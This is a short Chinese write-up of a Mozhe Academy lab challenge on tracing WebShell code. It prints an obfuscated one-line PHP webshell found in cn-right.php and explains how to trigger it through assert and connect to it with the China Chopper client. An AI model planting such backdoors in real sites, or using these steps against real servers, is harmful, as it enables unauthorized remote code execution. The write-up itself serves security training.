本文主要是介绍墨者学院 - WebShell代码分析溯源(第1题),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
下载源码
使用seay源代码审计系统扫一扫(实在不想一个个去看。。。)
seay源代码审计系统:https://pan.baidu.com/s/1UhIqGc_wYfelqN47Tn_Qjg
下载出源代码,找到cn-right.php
<?php
error_reporting(0);
$_GET['POST']($_POST['GET']);
?>典型变形一句话木马,需要构造为<?php assert($_POST['pass']);?>
则get传入“POST=assert”,POST传入密码“GET”
构造如下:http://xxxx/www/cn-right.php?POST=assert 密码为 GET
然后在菜刀连接的时候,在路径后面加上?POST=assert
密码是GET
然后寻找目标文件就ok
这篇关于墨者学院 - WebShell代码分析溯源(第1题)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
